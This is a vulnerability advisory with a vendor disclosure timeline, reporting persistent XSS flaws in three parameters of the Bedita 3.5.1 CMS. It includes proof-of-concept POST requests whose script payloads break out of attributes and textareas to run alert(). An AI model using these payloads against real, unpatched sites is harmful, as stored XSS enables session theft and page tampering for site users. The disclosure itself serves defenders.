########################################################################################
# Title: Bedita 3.5.1 XSS vulnerabilites
# Application: Bedita
# Version: 3.5.1
# Software Link: http://www.bedita.com/
# Date: 2015-03-09
# Author: Sébastien Morin
# Contact: https://twitter.com/SebMorin1
# Category: Web Applications
########################################################################################
===================
Introduction:
===================
BEdita is an open source web development framework that features a Content Management System (CMS) out-of-the-box.
BEdita is built upon the PHP development framework CakePHP.
(http://en.wikipedia.org/wiki/BEdita)
########################################################################################
===================
Report Timeline:
===================
2015-03-09 Vulnerabilities reported to vendor
2015-03-10 Vendor reponse
2015-03-11 Vendor confirmed
2015-08-31 Vendor releases version 3.6
2015-08-31 Advisory Release
########################################################################################
===================
Technical details:
===================
Persistent XSS:
===============
Bedita 3.5.1 contains multiples flaws that allows a persistent remote cross site scripting attack in the "cfg[projectName]", "data[stats_provider_url]" and "data[description]" parameters.
This could allow malicious users to create a specially crafted POST request that would execute arbitrary
code in a user's browser in order to gather data from them or to modify the content of the page presented to the user.
Exploits Examples:
1)cfg[projectName] parameter:
POST http://127.0.0.1/bedita/index.php/admin/saveConfig
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/bedita/index.php/admin/viewConfig
Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
Connection: keep-alive
[...]cfg%5BprojectName%5D=<script>alert(12345)</script>[...]
2) data[stats_provider_url] parameter:
POST http://127.0.0.1/bedita/index.php/areas/saveArea
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/bedita/index.php/areas/saveArea
Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
Connection: keep-alive
[...]data%5Bstats_provider_url%5D="><script>alert(12345)</script>[...]
3) data[description] parameter:
POST http://127.0.0.1/bedita/index.php/areas/saveSection
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/bedita/index.php/areas/saveSection
Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
Connection: keep-alive
[...]data%5Bdescription%5D=</textarea><script>alert(123)</script>[...]
########################################################################################
